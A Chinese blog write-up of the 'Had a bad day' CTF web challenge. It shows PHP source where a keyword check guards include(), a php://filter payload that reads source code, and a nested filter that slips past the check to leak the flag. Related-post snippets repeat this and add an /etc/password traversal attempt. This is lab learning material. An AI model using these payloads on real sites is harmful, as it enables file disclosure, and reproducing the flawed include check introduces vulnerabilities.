[BSidesCF 2020]Had a bad day -wp

最新推荐文章于 2024-04-26 23:16:19 发布
最新推荐文章于 2024-04-26 23:16:19 发布
阅读量301 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freerats/article/details/107834189
版权

在这里插入图片描述
发现有一个参数,考虑一下注入
加个’单引号发现报错

在这里插入图片描述
出现include(woofers’.php),怀疑有文件包含漏洞,用php协议读取一下内容

index.php?category=php://filter/read=convert.base64-encode/resource=index

看上面的报错可以知道,它在会帮参数自动添加.php,所以不需要自己加(加了后读不出东西,会报错,可以发现有两个php后缀,也可以发现问题)
在这里插入图片描述转码一下

<?php
	$file = $_GET['category'];
	if(isset($file))
	{
	if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
			include ($file . '.php');
			}
				else{
			echo "Sorry, we currently only support woofers and meowers.";
				}
			}
				?>

发现在传的内容里有‘woofers’,‘meowers’,‘index’三者之一才能进行包含
在这里就需要知道一点小技巧
php://filter伪协议可以套一层协议,如下,在之间加上woofers但不会影响文件包含

php://filter/read=convert.base64-encode/woofers/resource=flag

在这里插入图片描述
可以发现包含成功

<!-- Can you read this flag? -->
<?php
 // flag{40c4a714-73a5-4b0c-b87f-992de36152a8}
?>
冰可乐不加可乐
关注
[BSidesCF 2020]Had a bad day 1(伪协议嵌套)
weixin_45577185的博客
09-06 288
先用php://filter/read=convert.base64-encode/resource=index.php读取index.php的页面代码看看,发现读取不成功,后来才发现.php是后来加上去的 php://filter/read=convert.base64-encode/resource=index 然后用base64解密 <?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers".
buu做题笔记——[WUSTCTF2020]朴实无华&[BSidesCF 2020]Had a bad day
weixin_46330722的博客
11-07 695
BUU[WUSTCTF2020]朴实无华robots.txtresponselevel 1level 2level 3[BSidesCF 2020]Had a bad day [WUSTCTF2020]朴实无华 robots.txt 进入题目界面就一个Hack me,抓包也没看到啥有用的。dirsearch开启 ! 扫一扫有没有什么有用的,但是全都429,只能手动扫描了。备份文件,git泄露,robots协议…全都试一遍 。终于在robots.txt里找到了有用的东西。 response 访问是一个有
[BSidesCF 2020]Had a bad day_WP
Accompany的博客
01-21 441
分析 文章目录分析payload 打开题目后是有两个按钮的一个页面 分别打开,可以看到url栏的变换 http://04705a2c-5cf1-465e-8749-5822f3e05e20.node4.buuoj.cn:81/index.php?category=woofers 猜测是sql注入或者文件包含 我们将url后加上单引号闭合 可以判断为文件包含漏洞 无法直接包含到/flag,我们尝试用伪协议读取index.php的源码看看 php://filter/r
[BSidesCF 2020]Had a bad day
qq_43801002的博客
08-03 1513
题目 过程 1.点击一个按钮,注意到url有点类似伪协议。用poc尝试一下读取index.php php://filter/read=convert.base64-encode/resource=index 出现base64,解码得源码。只放出有参考意义的片段。原来是后面做了拼接,所以前面的poc才不能加.php <?php   $file = $_GET['category'];      if(isset($file))   {     if( strpos( $file, "woofers"
第四十八题——[BSidesCF 2020]Had a bad day
分享简单的安全技术
04-27 421
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,两个按钮,点击任意一个均出现一张照片,且URL参数提交相应的值 第二步:利用php:filter读取index.php发现出错 php://filter/convert.base64-encode/resource=index.php 第三步:去掉.php后缀名后成功获取到源码的base64值,解码后得到源码 <?php $file = $_GET['category']; if(isset(
BUUCTF:[BSidesCF 2020]Had a bad day
末初的CSDN博客
03-30 5562
BUUCTF:[BSidesCF 2020]Had a bad day 可能存在SQL注入或者文件包含,在我尝试读取index.php源码的时候出现了报错信息 的确是文件包含,但是有index.php却读取错误,报错显示无法打开流:操作失败在后面测试的时候,发现除掉后缀即可读取到源码 base64解码读取源码 <?php $file = $_GET['category']; ...
爬虫学习笔记(十)数据存储——xml、json、csv 2020.5.9
闵行小鱼塘
05-09 1423
本节学习数据存储的xml、json、csv
linux常用命令-part3
chinayuan的专栏
05-01 2万+
中文怎么发音 Ubuntu 有奔头,乌版图 Fedora 费德勒,菲朵拉 Debian 迪扁,德槟 CentOS 桑托斯 森头斯       Linux发展历史: 1) RedHat ---> 1.RedHat                2.CentOS                3.Fedora  桌面图形系统        rpm, yum 命令 2)
linux常用命令-part2
chinayuan的专栏
05-01 2万+
Ubuntu,Fedora,Debian,CentOS中文怎么发音 有奔头, 费德勒, 迪扁, 桑托斯。 乌版图 菲朵拉 德槟 森头斯 ================================ 使用find和wc命令统计代码行数 ================================ wc -l `find . -name "*.js" | xargs`
pandas io tools(使用python处理数据时候经常用到)
热门推荐
overstack的专栏
05-31 2万+
CSV & Text files The two workhorse functions for reading text files (a.k.a. flat files) are read_csv() and read_table(). They both use the same parsing code to intelligently convert tabular data in
[BSidesCF 2020]Had a bad day 1
plant1234的博客
05-27 201
[BSidesCF 2020]Had a bad day 1 首先打开题目得到: 通过测试发现在url处有: 疑似文件包含尝试: ../../../../etc/password 得到: 所以绕过这个限制 ?category=woofers/../../../../etc/password 发现报错了于是就用php伪协议试试读取index.php 解码得到php源码: <?php $file = $_GET['category']; if(isset($file))
BUUCTF Web [BSidesCF 2020]Had a bad day1
网安小趴菜
09-20 981
BUUCTF Web [BSidesCF 2020]Had a bad day1
BUUCTF_[BSidesCF 2020]Had a bad day
m_de_g的博客
04-26 651
【代码】BUUCTF_[BSidesCF 2020]Had a bad day
[BSidesCF_2020]Had_a_bad_day
m0_52199518的博客
04-05 321
WP 可以说,这个题目就是教学题目,虽然我不会 这里考查php伪协议嵌套 跨进题目的大门就要找到注入点,这里在看到url的形式后联想/尝试文件包含,我完全没有往这里想,反而鬼畜的想到了模板注入, 而且差点忘了直接访问flag.php确定flag值位置,习惯太糟糕了 在选择按钮后URL为 http://d4a987de-9150-4004-9493-9173f710ba17.node3.buuoj.cn/index.php?category=woofers http://d4a987de-9150-4004
Notice:A session had already been started-ignoringsession start()in E:\myhtmllWwW\zlybgiconn.php on line,如何禁止在页面显示此提示
最新发布
10-18
这个错误提示通常表示在E:\myhtmlWWW\zlybgiconn.php的某一行(line),尝试开始一个新的会话(session)但是发现已经有一个会话处于活动状态,PHP不允许同时启动两个会话。如果你想禁止单个页面显示此类警告,可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值